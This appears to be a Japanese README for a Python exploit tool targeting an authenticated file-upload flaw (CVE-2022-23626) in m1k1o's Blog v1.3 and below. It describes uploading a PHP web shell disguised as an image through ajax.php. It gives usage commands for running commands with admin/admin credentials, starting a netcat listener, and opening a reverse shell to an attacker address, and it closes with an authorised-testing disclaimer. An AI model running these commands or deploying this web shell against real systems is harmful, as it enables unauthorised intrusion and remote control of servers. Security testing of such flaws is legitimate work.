
認証済みのリモートコード実行エクスプロイト:m1k1o's Blog v1.3 における未検証ファイルアップロードを介したもので、Webシェルの展開とリバースシェルの機能を備えています。
m1k1oのブログ v1.3以下におけるファイルアップロードの脆弱性を利用した認証済みリモートコード実行
ajax.php?action=upload_imageエンドポイントはアップロードされたファイルタイプを適切に検証しないため、認証済みユーザーが画像に偽装したPHPウェブシェルをアップロードできます。攻撃者はその後、アップロードされたファイルに直接リクエストすることで実行をトリガーできます。
requests ライブラリpip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
まずリスナーを起動します:
nc -lnvp 4444
次に実行:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。テストする明示的な許可があるシステムでのみ使用してください。